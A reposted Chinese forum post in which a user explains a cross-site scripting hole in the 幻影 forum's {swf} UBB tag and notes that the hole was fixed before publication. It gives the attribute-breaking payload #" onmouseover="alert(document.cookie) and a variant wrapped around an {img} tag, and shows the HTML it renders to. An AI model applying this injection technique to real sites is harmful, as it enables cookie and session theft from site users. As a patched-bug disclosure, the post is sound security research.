[转载]幻影论坛跨站脚本漏洞

  文章作者：老凯

大家好...我是一个长期潜水幻影的虾米,是属于拜读mix大锅等各位大虾文档成长起来的一代。。。一直没有给这里做什么贡献，今天测试了一下这个的脚本安全性，有一点小小的发现，拿出来和大家分享一下。。

幻影的论坛整体的安全性自然没得说啦，如果要挖据出一个注入之类的漏洞，我连想都不敢想啊。。

（mix插嘴一句：我还没教你，你也不会阿，晚上回家求我吧！！）





好了。。具体说一下找这个跨站的思路和方法了。。

首先，幻影是屏蔽了所有的html标签的（废话）

其次，幻影是考虑了绝大部分的跨站方法的（还是废话）

然后，我想，用flash跨跨看看，结果呢，发现flash是被处理成<a href="http://xxxxxxxxxxx">http://xxxxxxxxxxx</a>的格式了。。

但是这里的处理方式和标准的url的ubb标签处理有了一些不同。。这里只考虑了吧以前显示成为flash改成连接的模式，而没有再考虑对连接的模式，按照以前对url字段应该做的过滤做过滤。。因此呢。。给我们留了一个制造跨站的机会。。

只要发flash的时候，url写成 #" onmouseover="alert(document.cookie) 就可以跨站了。。

emm跟我说，你应该尝试在a标记里边加入img标签，这样onmouseover的可能性会更大。。于是我们继续研究：

首先 随便找一个图片前边加上 #" onmouseover="alert(document.cookie)"
也就是 {swf}#" onmouseover="alert(document.cookie)" {img}{/img}{/swf}



转化成的html代码如下：

<a href="http://www.#" onmouseover="alert(document.cookie)" <img src="" border="0" alt="" onload="java script:if(this.width>screen.width-333)this.width=screen.width-333">" target="_blank">#" onmouseover="alert(document.cookie)" <img src="" border="0" alt="" onload="java script:if(this.width>screen.width-333)this.width=screen.width-333"></a>



注：发布前emm已修改掉这个漏洞了